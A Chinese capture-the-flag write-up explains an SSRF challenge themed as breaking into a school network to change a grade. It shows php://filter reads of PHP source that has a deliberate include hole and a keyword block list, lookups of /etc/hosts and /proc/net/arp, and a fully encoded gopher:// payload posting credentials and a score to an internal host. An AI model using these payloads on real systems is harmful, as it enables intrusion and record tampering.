题目描述
你挂科咯 试试打入学校内网来修改成绩吧(我命由我不由天系列)
可以知道本题需要使用ssrf
伪协议
在源代码中发现debug.php
在debug.php中发现可以使用伪协议
传入?file=php://filter/convert.base64-encode/resource=debug.php
查看debug.php的源码
1 2 3 4 5 6 7 8 9 10 11 12 13
| <?php
echo "<h1>快去学习PHP伪协议</h1>"; error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "NO!!!"; exit(); } include($file);
?>
|
传入?file=php://filter/convert.base64-encode/resource=index.php
查看index.php的源码
1 2 3 4 5 6 7 8 9 10 11
| <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch); curl_close($ch);
?>
|
从index.php中可以得出几个结论:
1:name为admin,password为123456,result为60
2:网段是172.17.0.0./24
再用伪协议查看当前主机的敏感文件/etc/hosts
和/proc/net/arp
,得到很多内网ip,fuzz一下,得到最终需要的一个内网ip172.17.0.7
ssrf
既然知道了主机等信息,那么就可以开始构造ssrf了,使用gopher协议打
构造post包
1 2 3 4 5 6
| http://106.55.154.252:8010/?url=gopher://172.17.0.7:80/_POST /index.php HTTP/1.1 Host: 172.17.0.7:80 Content-Type: application/x-www-form-urlencoded Content-Length: 36
name=admin&password=123456&result=60
|
将空格,冒号,等于用url编码,结尾换行用%0d%0a
替换
1
| http://106.55.154.252:8010/?url=gopher://172.17.0.7:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20172.17.0.7%3A80%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Aname%3Dadmin%26password%3D123456%26result%3D60%0D%0A
|
二次url编码:将_后的所有字符进行url编码
1
| http://106.55.154.252:8010/?url=gopher://172.17.0.7:80/_%50%4f%53%54%25%32%30%2f%69%6e%64%65%78%2e%70%68%70%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%31%37%2e%30%2e%37%25%33%41%38%30%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%36%25%30%44%25%30%41%25%30%44%25%30%41%6e%61%6d%65%25%33%44%61%64%6d%69%6e%25%32%36%70%61%73%73%77%6f%72%64%25%33%44%31%32%33%34%35%36%25%32%36%72%65%73%75%6c%74%25%33%44%36%30%25%30%44%25%30%41
|
总结
1:换行需要使用%0d%0a
替换
2:/etc/hosts
和/proc/net/arp
是查看网络信息的敏感文件